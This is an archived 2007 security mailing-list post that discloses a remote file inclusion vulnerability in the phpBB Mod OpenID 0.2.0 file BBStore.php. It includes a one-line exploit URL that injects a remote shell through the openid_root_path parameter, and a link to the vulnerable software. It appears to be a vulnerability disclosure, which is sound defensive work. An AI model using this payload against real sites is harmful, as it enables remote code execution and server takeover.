Hosting Provided By

phpBB Mod OpenID 0.2.0 BBStore.php Remote File Inclusion

From: <h3llcode(at)hotmail.it>
Date: Sun Sep 30 2007 - 18:50:47 EDT

+++++++++++++++++++++++++++++++++++++++++++++++++++
+
+ phpBB Mod OpenID 0.2.0 BBStore.php RFI
+ Risk: High
+ Found by Seph1roth
+ Site: http://blackroots.it
+
+++++++++++++++++++++++++++++++++++++++++++++++++++

+ Vulnerable Script Download: http://sourceforge.net/project/showfiles.php?group_id=178846

+ Exploit:

http://www.victim.it/path/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=[Shell] Received on Mon Oct 1 14:10:03 2007

This message: [ Message body ]
Next message: snagg(at)securenetwork.it: "Re: OpenSSL SSL_get_shared_ciphers() off-by-one buffer overflow"
Previous message: DoZ(at)HackersCenter.com: "eGov Content Manager Cross Site Scripting Vulrnability"
Next in thread: str0ke: "Re: phpBB Mod OpenID 0.2.0 BBStore.php Remote File Inclusion"
Reply: str0ke: "Re: phpBB Mod OpenID 0.2.0 BBStore.php Remote File Inclusion"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Sun Oct 28 2007 - 06:18:38 EDT